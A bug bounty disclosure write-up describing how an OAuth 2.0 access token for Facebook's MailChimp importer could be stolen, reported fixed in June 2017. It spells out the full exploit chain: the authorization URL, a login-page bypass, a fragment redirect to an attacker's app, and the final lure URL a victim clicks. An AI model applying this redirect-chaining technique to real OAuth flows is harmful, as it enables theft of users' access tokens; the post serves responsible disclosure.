Stealing Facebook MailChimp Application OAuth 2.0 Access Token
This post is about an bug that i found on Facebook MailChimp Application OAuth 2.0 which could have been used to steal Access_token. and The Source idea for this bug i got from prakharprasad blog post.
Facebook Ads Manager can import MailChimp customer data by using OAuth 2.0, to fetch data to Facebook Ads Manager.The application is a part of MailChimp website and it was developed by Facebook Developers. once the MailChimp user authorises the application, it will send MailChimp data to Facebook Ads Manager.
OAuth Authorisation URL for Facebook Custom Audiences :
Request :
https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/
Response :
https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0
First i tried to bypass redirect_uri but i can’t. then i tried the same oauth flow when i logged out in Facebook. it force me to login page.
https://www.facebook.com/login.php?next=https%3A%2F%2Fmailchimp-oauth.facebook.com%2Fads%2Fmanage%2Fcontact_importer_auth%2F#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0
but /#/ redirection will not work in login.php page. so i need to bypass the default login page .after some search finally found this URL to bypasses default login page. and the /#/ redirection also worked here.
https://www.facebook.com/recover/initiate?hacked=1
Mailchip oauth URL:
https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#/n/?https://apps.facebook.com/redirectbug_mailchip
Shorten the Above URL :
https://goo.gl/2Ep6BT
Final URL :
https://www.facebook.com/recover/initiate?hacked=1#/#/n/?business/url/?href=https://goo.gl/2Ep6BT&creative=1
The Victim click the above URL it redirect to Mailchip oauth page and ask for credentials. once the login was success the response access token will be redirect to my Facebook app URL.
The Fix :
Now /#/ redirection will not work for /recover/initiate/ page . so the token will not redirect to other path.
Timeline:
8-June-2017 : Report Sent
15 June-2017 : Further investigation by Facebook
16 June-2017 : Fixed by Facebook
22 June-2017 : $500 bounty awarded by Facebook